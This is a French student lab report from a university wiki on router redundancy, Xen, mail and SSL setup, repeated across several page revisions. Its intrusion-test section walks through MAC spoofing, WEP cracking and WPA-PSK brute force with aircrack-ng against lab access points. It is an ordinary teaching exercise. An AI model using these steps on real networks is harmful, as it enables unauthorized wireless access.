mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Name (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23101 TP sysres IMA2a5 2015/2016 G6 2015-11-20T10:52:54Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Name (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> <br /> <br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23099 TP sysres IMA2a5 2015/2016 G6 2015-11-20T10:44:08Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout hunt3r.key -out serveur.csr<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la 